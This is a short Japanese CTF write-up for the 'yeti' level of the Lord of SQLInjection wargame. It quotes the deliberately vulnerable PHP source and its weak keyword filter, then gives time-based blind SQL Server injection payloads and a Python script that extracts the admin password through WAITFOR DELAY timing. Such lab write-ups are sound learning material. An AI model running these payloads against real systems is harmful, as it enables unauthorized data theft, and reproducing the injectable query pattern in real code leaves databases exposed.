<?php include "./config.php"; login_chk(); $db = mssql_connect("yeti"); if(preg_match('/master|sys|information|;/i', $_GET['id'])) exit("No Hack ~_~"); if(preg_match('/master|sys|information|;/i', $_GET['pw'])) exit("No Hack ~_~"); $query = "select id from prob_yeti where id='{$_GET['id']}' and pw='{$_GET['pw']}'"; echo "<hr>query : <strong>{$query}</strong><hr><br>"; sqlsrv_query($db,$query); $query = "select pw from prob_yeti where id='admin'"; $result = sqlsrv_fetch_array(sqlsrv_query($db,$query)); if($result['pw'] === $_GET['pw']) solve("yeti"); highlight_file(__FILE__);
特徴は以下。
- SQL Server
- id,pwが入力可能
master,sys,information,;
がフィルタリング
- adminのpwを取ってくる必要がある
なにもできないように見えるが、Time-based Blind SQL Injectionかな…
Time-based Blind SQL Injection
長さを以下で取得。
' if ({md} <= (select len(pw) from prob_yeti where id='admin')) waitfor delay '00:00:0{interval}' else waitfor delay '00:00:00' --
内容を以下で取得。
' if ({md} <= (select ascii(substring(pw,{i+1},1)) from prob_yeti where id='admin')) waitfor delay '00:00:0{interval}' else waitfor delay '00:00:00' --
import requests import time url = "https://los.rubiya.kr/chall/yeti_e65.php" cookie = {'PHPSESSID': 'eoq5'} interval = 1 ok = 0 ng = 60 while ok + 1 != ng: md = (ok + ng) // 2 q = f"' if ({md} <= (select len(pw) from prob_yeti where id='admin')) waitfor delay '00:00:0{interval}' else waitfor delay '00:00:00' --" start = time.time() res = requests.get(url, params={'id': q}, cookies=cookie) print(f"[+] try {md}") if (time.time() - start) > interval: ok = md else: ng = md length = ok print(f"[*] length = {length}") ans = "" for i in range(0, length): ok = 0 ng = 256 while ok + 1 != ng: md = (ok + ng) // 2 q = f"' if ({md} <= (select ascii(substring(pw,{i+1},1)) from prob_yeti where id='admin')) waitfor delay '00:00:0{interval}' else waitfor delay '00:00:00' --" start = time.time() res = requests.get(url, params={'id': q}, cookies=cookie) print(f"[+] try {md}") if (time.time() - start) > interval: ok = md else: ng = md ans += str(chr(ok)) print(f"[*] {ans}") print(f"[*] find! {ans}")